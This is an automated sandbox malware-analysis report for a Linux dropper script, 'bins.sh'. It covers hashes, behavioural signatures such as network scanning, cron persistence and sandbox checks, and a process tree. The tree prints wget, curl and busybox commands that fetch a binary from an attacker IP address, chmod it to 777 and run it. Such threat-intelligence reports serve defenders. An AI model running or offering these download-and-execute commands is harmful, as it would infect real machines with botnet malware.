Analysis
-
max time kernel
149s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
11/12/2024, 19:31
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
8c689ff7fc20ca3b310ce0077e8f1812
-
SHA1
8884c1c04d514d14a0ea38c7388594ef699d504d
-
SHA256
65504742239889b8bc2955de8e775278370a6b357d9cde732b795761a1b80eb8
-
SHA512
aa45a2b371176bdb114c4c640507c8a43140b835a04175261c44ac8d8fec28f13e729308c26b55ae45dad94335cb51670d34899a571c04f4bf8223772e246767
-
SSDEEP
192:h3H23fjFxXvHeHzP6nBXPuPrMaDuUxUhUCUfBUtU+RvHeHzJXPuPrR0RUxUhUCUi:h3H23fjFSUBXPuPrMaDuUxUhUCUfBUt0
Malware Config
Signatures
-
Contacts a large (2118) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 684 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD 685 GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD -
Renames itself 1 IoCs
pid Process 686 GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.Fr24vp crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/21/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/904/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/948/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/954/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/967/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/990/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/997/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/20/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/933/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/995/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/698/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/880/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/897/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1014/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1035/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1093/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/784/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1057/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/262/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/774/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/789/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/792/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/826/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/992/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1034/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/697/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/790/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/945/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/138/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/715/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/759/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/866/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/996/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1013/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1066/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/111/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/644/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/813/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/922/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/934/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/974/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/820/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/781/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1054/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1058/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/140/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/648/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/733/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/840/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/22/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/765/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/823/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/844/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/962/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1036/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/1050/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/980/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/991/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/266/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/894/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/955/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD File opened for reading /proc/filesystems crontab File opened for reading /proc/953/cmdline GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD wget File opened for modification /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD curl File opened for modification /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:651
-
/bin/rm/bin/rm bins.sh2⤵PID:654
-
-
/usr/bin/wgetwget http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵
- Writes file to tmp directory
PID:658
-
-
/usr/bin/curlcurl -O http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://37.44.238.68/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵
- Writes file to tmp directory
PID:683
-
-
/bin/chmodchmod 777 GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD./GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:685 -
/bin/shsh -c "crontab -l"3⤵PID:687
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:688
-
-
-
/bin/shsh -c "crontab -"3⤵PID:689
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:690
-
-
-
-
/bin/rmrm GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD2⤵PID:698
-
-
/usr/bin/wgetwget http://37.44.238.68/bins/Q35Esy6cEEsSgdQnvuctrU3mxBWjUnQPlV2⤵PID:701
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD50863467c1aa5ffafaebf14f3671161bc
SHA1c57bfe66c06e0caf5c484a360a20fb361b5f9733
SHA256ab86345dd834022555ae5ab3cebb8d1b774dd91343690217bce05da2196994b0
SHA51236f9caa27da3fa40465c050e57400cc1aef5695f94e910568cfeb7653121897ecbfcd01d591ca332417a3f53a5300605dbfe6f9dda45ae036c70624924a8ec6c